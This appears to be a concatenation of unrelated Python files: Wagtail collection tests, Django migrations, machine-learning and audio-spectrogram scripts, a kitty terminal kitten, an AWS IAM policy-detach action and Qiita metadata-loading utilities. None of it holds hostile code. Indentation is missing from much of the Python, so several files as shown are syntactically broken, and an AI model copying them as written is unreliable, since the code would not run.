# Grant the marketing group permission to another collection so there is a valid destination
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.finance_collection,
permission=self.add_permission,
)
# We can move nodes lower on the tree
self.post(
self.marketing_sub_collection.id,
{"name": "Moved Sub", "parent": self.finance_collection.id},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_sub_collection.pk).get_parent(),
self.finance_collection,
)
# But we can't move the node to which our edit permission was assigned; update is ignored
self.post(
self.marketing_collection.id,
{
"name": self.marketing_collection.name,
"parent": self.finance_collection.id,
},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_collection.pk).get_parent(),
self.root_collection,
)
def test_page_shows_delete_link_only_if_delete_permitted(self):
# Retrieve edit form and check fields
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertNotContains(response, "Delete collection")
        # Add delete permission to parent collection and try again
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.delete_permission,
)
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertContains(response, "Delete collection")
class TestDeleteCollectionAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
self.root_collection = Collection.get_first_root_node()
self.collection = self.root_collection.add_child(name="Holiday snaps")
def get(self, params={}, collection_id=None):
return self.client.get(
reverse(
"wagtailadmin_collections:delete",
args=(collection_id or self.collection.id,),
),
params,
)
def post(self, post_data={}, collection_id=None):
return self.client.post(
reverse(
"wagtailadmin_collections:delete",
args=(collection_id or self.collection.id,),
),
post_data,
)
def test_get(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/generic/confirm_delete.html")
def test_cannot_delete_root_collection(self):
response = self.get(collection_id=self.root_collection.id)
self.assertEqual(response.status_code, 404)
def test_get_nonexistent_collection(self):
response = self.get(collection_id=100000)
self.assertEqual(response.status_code, 404)
def test_get_nonempty_collection(self):
Document.objects.create(title="Test document", collection=self.collection)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, "wagtailadmin/collections/delete_not_empty.html"
)
def test_get_collection_with_descendent(self):
self.collection.add_child(instance=Collection(name="Test collection"))
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, "wagtailadmin/collections/delete_not_empty.html"
)
def test_post(self):
response = self.post()
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was deleted
with self.assertRaises(Collection.DoesNotExist):
Collection.objects.get(id=self.collection.id)
def test_post_nonempty_collection(self):
Document.objects.create(title="Test document", collection=self.collection)
response = self.post()
self.assertEqual(response.status_code, 403)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.collection.id))
def test_post_collection_with_descendant(self):
self.collection.add_child(instance=Collection(name="Test collection"))
response = self.post()
self.assertEqual(response.status_code, 403)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.collection.id))
def test_post_root_collection(self):
# first we have to clear out the root collection so it is empty
self.collection.delete()
response = self.post(collection_id=self.root_collection.id)
self.assertEqual(response.status_code, 404)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.root_collection.id))
class TestDeleteCollection(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
# Grant the marketing group permission to delete
self.users_delete_permission = GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.delete_permission,
)
self.login(self.marketing_user, password="password")
def get(self, collection_id, params={}):
return self.client.get(
reverse("wagtailadmin_collections:delete", args=(collection_id,)), params
)
def post(self, collection_id, post_data={}):
return self.client.post(
reverse("wagtailadmin_collections:delete", args=(collection_id,)), post_data
)
def test_get(self):
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/generic/confirm_delete.html")
def test_post(self):
response = self.post(collection_id=self.marketing_sub_collection.id)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was deleted
with self.assertRaises(Collection.DoesNotExist):
Collection.objects.get(id=self.marketing_sub_collection.id)
def test_cannot_delete_someone_elses_collection(self):
response = self.get(self.finance_collection.id)
self.assertEqual(response.status_code, 404)
def test_cannot_delete_someone_elses_collection_post(self):
response = self.post(self.finance_collection.id)
self.assertEqual(response.status_code, 404)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.marketing_sub_collection.id))
def test_cannot_delete_their_own_root_collection(self):
response = self.get(self.marketing_collection.id)
self.assertEqual(response.status_code, 404)
def test_cannot_delete_their_own_root_collection_post(self):
response = self.post(self.marketing_collection.id)
self.assertEqual(response.status_code, 404)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.marketing_collection.id))
def test_cannot_delete_collection_with_descendants(self):
self.marketing_sub_collection.add_child(
instance=Collection(name="Another collection")
)
response = self.get(self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, "wagtailadmin/collections/delete_not_empty.html"
)
def test_cannot_delete_collection_with_descendants_post(self):
self.marketing_sub_collection.add_child(
instance=Collection(name="Another collection")
)
response = self.post(self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 403)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.marketing_sub_collection.id))
|
# Copyright (C) 2007-2017, Raffaele Salmaso <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import django.db.models.deletion
import django.utils.timezone
import fluo.db.models.fields
import model_history.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='History',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', fluo.db.models.fields.CreationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='created')),
('last_modified_at', fluo.db.models.fields.ModificationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('app_label', models.CharField(max_length=100)),
('model', models.CharField(max_length=100)),
('source_id', models.PositiveIntegerField(verbose_name='source id')),
('source_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='contenttypes.ContentType', verbose_name='source content type')),
],
options={
'base_manager_name': 'objects',
'verbose_name_plural': 'Histories',
'ordering': ['-created_at'],
'verbose_name': 'History',
},
),
migrations.CreateModel(
name='HistoryRow',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', fluo.db.models.fields.CreationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='created')),
('last_modified_at', fluo.db.models.fields.ModificationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('fields', model_history.fields.JSONField(default={}, verbose_name='fields')),
('updated', model_history.fields.JSONField(default={}, verbose_name='updated fields')),
('history', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='rows', to='model_history.History', verbose_name='history')),
],
options={
'base_manager_name': 'objects',
'verbose_name_plural': 'rows',
'ordering': ['-created_at'],
'verbose_name': 'row',
},
),
migrations.AlterUniqueTogether(
name='history',
unique_together=set([('app_label', 'model', 'source_id')]),
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 2 08:22:48 2022
@author: xavier.mouy
"""
from ecosound.core.annotation import Annotation
from ecosound.core.metadata import DeploymentInfo
from ecosound.core.audiotools import Sound
import pandas as pd
from datetime import datetime
import os
import librosa
import librosa.display
import soundfile
import csv
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
def calc_spectro(y, sr, n_fft, hop_length, win_length, title="Power spectrogram"):
S = librosa.stft(y, n_fft=n_fft, hop_length=hop_length, win_length=win_length)
S = librosa.amplitude_to_db(S, ref=np.max)
fig, ax = plt.subplots()
img = librosa.display.specshow(
S, hop_length=hop_length, y_axis="linear", x_axis="time", sr=sr, ax=ax
)
ax.set_title(title)
fig.colorbar(img, ax=ax, format="%+2.0f dB")
return fig, ax, S
params = dict()
params["dataset_file_path"] = r"C:\Users\xavier.mouy\Documents\GitHub\minke-whale-dataset\datasets\Annotations_dataset_MW-NN_20220204T192254.nc"
params["out_dir"] = r"C:\Users\xavier.mouy\Documents\GitHub\minke-whale-dataset\dataset_spectrograms"
params["audio_dir"] = r"C:\Users\xavier.mouy\Documents\GitHub\minke-whale-dataset\datasets"
params["sanpling_rate_hz"] = 2000
params["clips_buffer_s"] = 0
params["spectro_on"] = True
params["spetro_nfft"] = 512
params["spetro_frame"] = 512
params["spetro_inc"] = 128
params["spetro_on_npy"] = True
# Load dataset
dataset = Annotation()
dataset.from_netcdf(params["dataset_file_path"])
# define the different class names and create separate folders
outdirname = os.path.join(params["out_dir"],os.path.splitext(os.path.basename(params["dataset_file_path"]))[0])
if os.path.isdir(outdirname) == False:
os.mkdir(outdirname)
labels = list(set(dataset.data['label_class']))
# loop through each class_labels
for label in labels:
print(label)
current_dir = os.path.join(outdirname, label)
if os.path.isdir(current_dir) == False:
os.mkdir(current_dir)
annot_sp = dataset.data[dataset.data["label_class"] == label]
# loop through is annot for that class label
for idx, annot in annot_sp.iterrows():
F = str(annot.uuid) + '.png'
if os.path.isfile(os.path.join(current_dir, F)) == False: # only if file doesn't exist already
print('Processing file', F)
# define start/stop times +/- buffer
t1 = annot.time_min_offset - params["clips_buffer_s"]
if t1 <= 0:
t1 = 0
t2 = annot.time_max_offset + params["clips_buffer_s"]
duration = t2 - t1
# load sound clip
y, s = librosa.load(
os.path.join(annot["audio_file_dir"], annot["audio_file_name"])
+ annot["audio_file_extension"],
sr=params["sanpling_rate_hz"],
offset=t1,
duration=duration,
            )  # resampled to params["sanpling_rate_hz"] (2 kHz) on load
t2 = t1 + (len(y)/s) # readjust end time in case it exceeded the end of the file (which librosa handles by taking the last sample)
# Create audio clip standard name
#title = annot.deployment_ID + ' ' + annot.audio_file_name
title = annot.audio_file_name
# write spectrogram image
if params["spectro_on"]:
fig, ax, S = calc_spectro(
y,
s,
params["spetro_nfft"],
params["spetro_inc"],
win_length=params["spetro_frame"],
title = title
)
fig.savefig(os.path.join(current_dir, F), dpi=600)
plt.close("all")
plt.close()
plt.cla()
plt.clf()
#if params["spetro_on_npy"]:
# np.save(os.path.splitext(outfilename)[0] + ".npy", S)
#annot_unique_id += 1
|
"""A very simple MNIST classifier.
See extensive documentation at
http://tensorflow.org/tutorials/mnist/beginners/index.md
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
# assert tf.__version__ == "1.8.0"
tf.set_random_seed(20180130)
np.random.seed(20180130)
# Import data
from tensorflow.examples.tutorials.mnist import input_data
from datetime import datetime
import sys
sys.path.append("/data")
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
start_time = datetime.now()
sess = tf.InteractiveSession()
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x, W) + b)
# Define loss and optimizer
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = -tf.reduce_sum(y_ * tf.log(y))
train_step = tf.train.GradientDescentOptimizer(0.005).minimize(cross_entropy)
obj_var = tf.reduce_min(tf.abs(y))
# Test trained model
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Train
tf.train.write_graph(sess.graph_def, '/data/scripts/study_case/pbtxt_files', 'SOIPS14.pbtxt')
tf.initialize_all_variables().run()
batch_size = 205
'''inserted code'''
from scripts.utils.tf_utils import TensorFlowScheduler
scheduler = TensorFlowScheduler(name="soips14")
'''inserted code'''
while True:
batch_xs, batch_ys = mnist.train.next_batch(205)
loss = sess.run(cross_entropy, feed_dict={x: batch_xs, y_: batch_ys})
'''inserted code'''
scheduler.loss_checker(loss)
'''inserted code'''
sess.run(train_step,feed_dict={x: batch_xs, y_: batch_ys})
'''inserted code'''
scheduler.check_time()
'''inserted code'''
|
"""
This is the main, runnable .py script for the xor-problem
"""
from nn import NN
from optimizer import ADAM
from loss import cross_entropy_loss
from batching import MiniBatcher
import numpy as np
import matplotlib.pyplot as plt
import os
savefig_location = os.path.join(os.path.dirname(__file__), 'media')
train_samples = np.array([
[0, 0],
[0, 1],
[1, 0],
[1, 1]
])
train_labels = np.array([0, 1, 1, 0])
# Initializing our neural network and ADAM classes
nn = NN(input_length=2, n_hidden_units=10, n_outputs=2, seed=1111)
adam = ADAM(layer_dims=nn.layer_dims, alpha=0.01, beta_m=0.99, beta_v=0.999, epsilon=0.00001)
mb = MiniBatcher(data=train_samples, labels=train_labels, batch_size=4, seed=111)
# Running our training loop for 300 epochs with the entirety of our training data at each batch
# We'll also be keeping track of our loss at each step...
historical_losses = list()
EPOCHS = 300
epoch_counter = 0
while epoch_counter < EPOCHS:
# Grabbing a mini-batch
X_mb, y_mb = mb.fetch_minibatch()
# Explicit check to see if we have run out of data
# If so, increment the epoch and reset the MiniBatcher
if isinstance(X_mb, bool):
epoch_counter += 1
mb.new_epoch()
X_mb, y_mb = mb.fetch_minibatch()
output = nn.forward_pass(input=X_mb)
sm_output = nn.softmax(input=output)
loss = cross_entropy_loss(y_pred=sm_output, y_actual=y_mb)
grad = nn.get_gradient(input=X_mb, y_pred=sm_output, y_actual=y_mb)
adam.update_weights(weights=nn.weights, gradient=grad)
historical_losses.append(loss)
# Our final prediction...
y_pred = nn.softmax(nn.forward_pass(input=train_samples))
print(f'Trained network predictions: {np.argmax(y_pred, axis=1)}')
print(f'Ground-truth values: {train_labels}')
if np.array_equal(np.argmax(y_pred, axis=1), train_labels):
print('Congrats, your network has solved the XOR problem!')
else:
print('Looks like your network is not quite there... Try more epochs.')
# Converting the historical_loss list into a plot...
plt.plot(historical_losses)
plt.xlabel('Epoch')
plt.ylabel('Cross-entropy loss')
plt.title('Loss per training epoch')
plt.savefig(savefig_location + '/xor_loss.png', dpi=400)
|
import pytest
from sklearn.datasets import load_iris, make_regression
from Amplo.AutoML import DataExplorer
from tests import rmtree
@pytest.fixture(scope='class', params=['classification', 'regression'])
def make_mode(request):
mode = request.param
if mode == 'classification':
x, y = load_iris(return_X_y=True, as_frame=True)
elif mode == 'regression':
        # Interestingly enough, the regression test for `test_explorer` ends up in a deadlock,
# specifically in the `DataExplorer.shap()` method. It's even more interesting that
# the california housing dataset works fine when using `unittest`
# x, y = fetch_california_housing(return_X_y=True, as_frame=True)
x, y = make_regression()
else:
raise NotImplementedError('Invalid mode')
request.cls.x = x
request.cls.y = y
request.cls.mode = mode
yield
@pytest.mark.usefixtures('make_mode')
class TestDataExploring:
def test_explorer(self):
tmp_folder = 'tmp/'
eda = DataExplorer(self.x, y=self.y, mode=self.mode, folder=tmp_folder)
eda.run()
rmtree(tmp_folder)
# class TestDataExploring(unittest.TestCase):
#
# @classmethod
# def setUpClass(cls):
# cls.class_x, cls.class_y = load_iris(return_X_y=True, as_frame=True)
# cls.reg_x, cls.reg_y = fetch_california_housing(return_X_y=True)
#
# def test_regression(self):
# eda = DataExplorer(self.reg_x, y=self.reg_y, mode='regression', folder='tmp/')
# eda.run()
# rmtree('tmp/')
#
# def test_classification(self):
# eda = DataExplorer(self.class_x, y=self.class_y, mode='classification', folder='tmp/')
# eda.run()
# rmtree('tmp/')
|
from kittens.tui.handler import result_handler
import os
def main(args):
pass
@result_handler(no_ui=True)
def handle_result(args, result, target_window_id, boss):
window_title = "vimjupyter"
jupyter_cmd = "jupyter"
cwd = args[1].replace(" ","\\ ")
cmd = f"cd {cwd}; {jupyter_cmd} console"
# Runs a command in the window
def run_cmd(window):
boss.child_monitor.needs_write(window.id, cmd + "\x0d")
    # Try to find an existing jupyter console window
windows = list(boss.match_windows("title:" + window_title))
if len(windows) > 0:
for window in windows:
            # If we found a matching window, check whether our jupyter console
            # command is already running in it
fg_cmd = " ".join(window.child.foreground_cmdline)
if cmd in fg_cmd:
                # A jupyter console started by this kitten is already running here
                # Send a safe quit before restarting it
boss.child_monitor.needs_write(window.id, "q")
# boss.child_monitor.needs_write(window.id, "\x03")
                # Start the jupyter console
run_cmd(window)
else:
                # No jupyter console running in this window, so just start one
# boss.child_monitor.needs_write(window.id, "\x03")
                # Start the jupyter console
run_cmd(window)
return f"{cmd}, {fg_cmd}, {str(windows)}"
# If there isn't a window open, check that there is an active tab
tab = boss.active_tab
if tab is None:
return
    # Switch the layout to splits, because we want to open the jupyter console to the right
tab.goto_layout("tall")
# Store the currently active window
active_window = tab.active_window
# Create the new window
window = tab.new_window(override_title=window_title, location="vsplit")
    # Write the jupyter console command
run_cmd(window)
# Switch the active window back to what it was
boss.set_active_window(active_window)
return cmd
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-29 12:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djangovirtualpos', '0009_vpsrefundoperation'),
]
operations = [
migrations.RemoveField(
model_name='vposrefundoperation',
name='confirmation_code',
),
migrations.AlterField(
model_name='vposrefundoperation',
name='status',
field=models.CharField(choices=[('pending', 'Pending'), ('completed', 'Completed'), ('failed', 'Failed')], max_length=64, verbose_name='Estado de la devoluci\xf3n'),
),
]
|
from django.conf.urls import url
from django.conf.urls import include
from django.urls import path
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register('hello-viewset', views.HelloViewSet, 'hello-viewset')
router.register('signup', views.UserProfileViewSet)
router.register('login', views.LoginViewSet, 'login')
router.register('feed', views.UserProfileFeedViewSet)
router.register('education', views.CollegeViewSet)
router.register('work-experience', views.CompanyViewSet)
router.register('projects', views.ProjectViewSet)
router.register('interests', views.InterestViewSet)
router.register('skills', views.SkillViewSet)
router.register('achievements', views.AchievementViewSet)
router.register('certificates', views.CertificationViewSet)
router.register('about', views.AboutViewSet)
router.register('portfolio-update', views.PostPortfolioDetailsViewSet)
urlpatterns = [
    path("hello-view/<username>", views.HelloApiView.as_view()),
path("user/<username>", views.PortfolioViewSet.as_view(), name="portfolio_list"),
path("user/<username>/<int:pk>", views.PortfolioDetailViewSet.as_view(), name="portfolio_detail"),
url(r'', include(router.urls)),
]
|
"""
## iam_detach_policy
What it does: detaches the policy from all entities (users, groups and roles) it is attached to
Usage: iam_detach_policy
Limitations: none
"""
import boto3
from botocore.exceptions import ClientError
def detach_policy_from_entity(iterator, policy_arn):
"""
    Iterates through the given entities and detaches the policy from each one.
"""
text_output = ''
for entity in iterator:
try:
entity.detach_policy(PolicyArn=policy_arn)
except ClientError as e:
            text_output += "Unexpected error: %s \n" % e  # accumulate errors across entities
return text_output
def run_action(session,rule,entity,params):
iam_resource = session.resource('iam')
policy_arn = entity['arn']
iam_policy = iam_resource.Policy(policy_arn)
# check if the policy attached to any entity
if iam_policy.attachment_count <= 0:
return f"The policy {policy_arn} is not attached to an entity"
    # detach the policy from every entity
text_output = ''
text_output += detach_policy_from_entity(iam_policy.attached_groups.all(), policy_arn)
text_output += detach_policy_from_entity(iam_policy.attached_roles.all(), policy_arn)
text_output += detach_policy_from_entity(iam_policy.attached_users.all(), policy_arn)
return text_output
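# Hedged usage sketch, assuming a boto3 session with IAM permissions and a
# CloudGuard-style entity dict whose 'arn' key holds the policy ARN; the ARN
# below is a placeholder and the 'rule'/'params' arguments are unused by
# run_action, so empty values are enough here.
if __name__ == '__main__':
    session = boto3.Session()
    example_entity = {'arn': 'arn:aws:iam::123456789012:policy/ExamplePolicy'}
    print(run_action(session, rule={}, entity=example_entity, params={}))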
|
import unittest
from getnet.services.customers import Customer, Address
sample = {
"seller_id": "6eb2412c-165a-41cd-b1d9-76c575d70a28",
"customer_id": "customer_21081826",
"first_name": "João",
"last_name": "da Silva",
"document_type": "CPF",
"document_number": "78075751159",
"birth_date": "1976-02-21",
"phone_number": "5551999887766",
"celphone_number": "5551999887766",
"email": "[email protected]",
"observation": "O cliente tem interesse no plano x.",
"address": {
"street": "Av. Brasil",
"number": "1000",
"complement": "Sala 1",
"district": "São Geraldo",
"city": "Porto Alegre",
"state": "RS",
"country": "Brasil",
"postal_code": "90230060",
},
}
class CustomerTest(unittest.TestCase):
def testAddressConversion(self):
data = sample.copy()
customer = Customer(**data)
self.assertIsInstance(customer.address, Address)
self.assertEqual(
customer.address.postal_code, data.get("address").get("postal_code")
)
if __name__ == "__main__":
unittest.main()
|
"""
Declare a function that returns an error.
"""
def blad():
return ValueError
print(blad())
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from collections import defaultdict
from future.utils import PY3, viewitems
from future.utils.six import StringIO
import pandas as pd
import numpy as np
import warnings
from skbio.io.util import open_file
from skbio.util import find_duplicates
from qiita_db.exceptions import (QiitaDBColumnError, QiitaDBWarning,
QiitaDBError, QiitaDBDuplicateHeaderError)
from .constants import CONTROLLED_COLS, NA_VALUES, TRUE_VALUES, FALSE_VALUES
if PY3:
from string import ascii_letters as letters, digits
else:
from string import letters, digits
def type_lookup(dtype):
"""Lookup function to transform from python type to SQL type
Parameters
----------
dtype : object
The python type
Returns
-------
str
The SQL type
"""
if dtype in [np.int8, np.int16, np.int32, np.int64]:
return 'integer'
elif dtype in [np.float16, np.float32, np.float64]:
return 'float8'
elif np.issubdtype(dtype, np.datetime64):
return 'timestamp'
elif dtype == np.bool:
return 'bool'
else:
return 'varchar'
def get_datatypes(metadata_map):
r"""Returns the datatype of each metadata_map column
Parameters
----------
metadata_map : DataFrame
The MetadataTemplate contents
Returns
-------
list of str
The SQL datatypes for each column, in column order
"""
return [type_lookup(dtype) for dtype in metadata_map.dtypes]
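# A minimal sketch of type_lookup/get_datatypes on a small throwaway DataFrame;
# kept as an uncalled helper so importing this module stays side-effect free.
# Column names below are purely illustrative.
def _example_get_datatypes():
    df = pd.DataFrame({'depth': [1, 2], 'ph': [6.5, 7.0], 'site': ['a', 'b']})
    # The int column maps to 'integer', the float column to 'float8' and the
    # str column to 'varchar'
    return get_datatypes(df)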
def cast_to_python(value):
"""Casts the value from numpy types to python types
Parameters
----------
value : object
The value to cast
Returns
-------
object
The input value casted to a python type
"""
if isinstance(value, np.generic):
value = np.asscalar(value)
return value
def as_python_types(metadata_map, headers):
r"""Converts the values of metadata_map pointed by headers from numpy types
to python types.
Psycopg2 does not support the numpy types, so we should cast them to the
closest python type
Parameters
----------
metadata_map : DataFrame
The MetadataTemplate contents
headers : list of str
The headers of the columns of metadata_map that needs to be converted
to a python type
Returns
-------
list of lists
The values of the columns in metadata_map pointed by headers cast to
python types.
"""
values = []
for h in headers:
# we explicitly check for cases when we have a datetime64 object
# because otherwise doing the isinstance check against np.generic fails
if isinstance(metadata_map[h].values[0], np.datetime64):
values.append(list(map(pd.to_datetime, metadata_map[h])))
elif isinstance(metadata_map[h].values[0], np.generic):
values.append(list(map(np.asscalar, metadata_map[h])))
else:
values.append(list(metadata_map[h]))
return values
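# A short sketch of as_python_types, assuming a DataFrame backed by numpy
# scalars; the returned nested lists hold native Python values that psycopg2
# can adapt directly. Never called at import time.
def _example_as_python_types():
    df = pd.DataFrame({'latitude': [1.5, 2.5], 'depth': [10, 20]})
    # Returns one list per requested header, e.g. [[1.5, 2.5], [10, 20]]
    return as_python_types(df, ['latitude', 'depth'])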
def prefix_sample_names_with_id(md_template, study_id):
r"""prefix the sample_names in md_template with the study id
Parameters
----------
md_template : DataFrame
The metadata template to modify
study_id : int
The study to which the metadata belongs to
"""
# Get all the prefixes of the index, defined as any string before a '.'
prefixes = {idx.split('.', 1)[0] for idx in md_template.index}
# If the samples have been already prefixed with the study id, the prefixes
# set will contain only one element and it will be the str representation
# of the study id
if len(prefixes) == 1 and prefixes.pop() == str(study_id):
# The samples were already prefixed with the study id
warnings.warn("Sample names were already prefixed with the study id.",
QiitaDBWarning)
else:
# Create a new pandas series in which all the values are the study_id
# and it is indexed as the metadata template
study_ids = pd.Series([str(study_id)] * len(md_template.index),
index=md_template.index)
# Create a new column on the metadata template that includes the
# metadata template indexes prefixed with the study id
md_template['sample_name_with_id'] = (study_ids + '.' +
md_template.index.values)
md_template.index = md_template.sample_name_with_id
del md_template['sample_name_with_id']
# The original metadata template had the index column unnamed - remove
# the name of the index for consistency
md_template.index.name = None
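# A minimal sketch of prefix_sample_names_with_id, assuming a template indexed
# by bare sample names and a made-up study id of 1. The function modifies the
# DataFrame in place; calling it a second time only emits a QiitaDBWarning.
def _example_prefix_sample_names():
    md = pd.DataFrame({'ph': [6.5, 7.0]}, index=['sample_a', 'sample_b'])
    prefix_sample_names_with_id(md, 1)
    # md.index is now ['1.sample_a', '1.sample_b']
    return md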
def load_template_to_dataframe(fn, strip_whitespace=True, index='sample_name'):
"""Load a sample/prep template or a QIIME mapping file into a data frame
Parameters
----------
fn : str or file-like object
filename of the template to load, or an already open template file
strip_whitespace : bool, optional
Defaults to True. Whether or not to strip whitespace from values in the
input file
index : str, optional
Defaults to 'sample_name'. The index to use in the loaded information
Returns
-------
DataFrame
Pandas dataframe with the loaded information
Raises
------
ValueError
Empty file passed
QiitaDBColumnError
If the sample_name column is not present in the template.
If there's a value in one of the reserved columns that cannot be cast
to the needed type.
QiitaDBWarning
When columns are dropped because they have no content for any sample.
QiitaDBError
When non UTF-8 characters are found in the file.
QiitaDBDuplicateHeaderError
If duplicate columns are present in the template
Notes
-----
The index attribute of the DataFrame will be forced to be 'sample_name'
and will be cast to a string. Additionally rows that start with a '\t'
character will be ignored and columns that are empty will be removed. Empty
sample names will be removed from the DataFrame.
The following table describes the data type per column that will be
enforced in `fn`. Column names are case-insensitive but will be lowercased
on addition to the database.
+-----------------------+--------------+
| Column Name | Python Type |
+=======================+==============+
| sample_name | str |
+-----------------------+--------------+
| #SampleID | str |
+-----------------------+--------------+
| physical_location | str |
+-----------------------+--------------+
| has_physical_specimen | bool |
+-----------------------+--------------+
| has_extracted_data | bool |
+-----------------------+--------------+
| sample_type | str |
+-----------------------+--------------+
| host_subject_id | str |
+-----------------------+--------------+
| description | str |
+-----------------------+--------------+
| latitude | float |
+-----------------------+--------------+
| longitude | float |
+-----------------------+--------------+
"""
# Load in file lines
holdfile = None
with open_file(fn, mode='U') as f:
holdfile = f.readlines()
if not holdfile:
raise ValueError('Empty file passed!')
# Strip all values in the cells in the input file, if requested
if strip_whitespace:
for pos, line in enumerate(holdfile):
holdfile[pos] = '\t'.join(d.strip(" \r\x0b\x0c")
for d in line.split('\t'))
# get and clean the controlled columns
cols = holdfile[0].split('\t')
controlled_cols = {'sample_name'}
controlled_cols.update(CONTROLLED_COLS)
holdfile[0] = '\t'.join(c.lower() if c.lower() in controlled_cols else c
for c in cols)
if index == "#SampleID":
# We're going to parse a QIIME mapping file. We are going to first
# parse it with the QIIME function so we can remove the comments
# easily and make sure that QIIME will accept this as a mapping file
data, headers, comments = _parse_mapping_file(holdfile)
holdfile = ["%s\n" % '\t'.join(d) for d in data]
holdfile.insert(0, "%s\n" % '\t'.join(headers))
# The QIIME parser fixes the index and removes the #
index = 'SampleID'
# index_col:
# is set as False, otherwise it is cast as a float and we want a string
# keep_default:
# is set as False, to avoid inferring empty/NA values with the defaults
# that Pandas has.
# na_values:
# the values that should be considered as empty
# true_values:
# the values that should be considered "True" for boolean columns
# false_values:
# the values that should be considered "False" for boolean columns
# converters:
# ensure that sample names are not converted into any other types but
# strings and remove any trailing spaces. Don't let pandas try to guess
# the dtype of the other columns, force them to be a str.
# comment:
# using the tab character as "comment" we remove rows that are
# constituted only by delimiters i. e. empty rows.
try:
template = pd.read_csv(StringIO(''.join(holdfile)), sep='\t',
encoding='utf-8', infer_datetime_format=True,
keep_default_na=False, na_values=NA_VALUES,
true_values=TRUE_VALUES,
false_values=FALSE_VALUES,
parse_dates=True, index_col=False, comment='\t',
mangle_dupe_cols=False, converters={
index: lambda x: str(x).strip(),
# required sample template information
'physical_location': str,
'sample_type': str,
# collection_timestamp is not added here
'host_subject_id': str,
'description': str,
# common prep template information
'center_name': str,
'center_projct_name': str})
except UnicodeDecodeError:
# Find row number and col number for utf-8 encoding errors
headers = holdfile[0].strip().split('\t')
errors = defaultdict(list)
for row, line in enumerate(holdfile, 1):
for col, cell in enumerate(line.split('\t')):
try:
cell.encode('utf-8')
except UnicodeError:
errors[headers[col]].append(row)
lines = ['%s: row(s) %s' % (header, ', '.join(map(str, rows)))
for header, rows in viewitems(errors)]
raise QiitaDBError('Non UTF-8 characters found in columns:\n' +
'\n'.join(lines))
# Check that we don't have duplicate columns
if len(set(template.columns)) != len(template.columns):
raise QiitaDBDuplicateHeaderError(find_duplicates(template.columns))
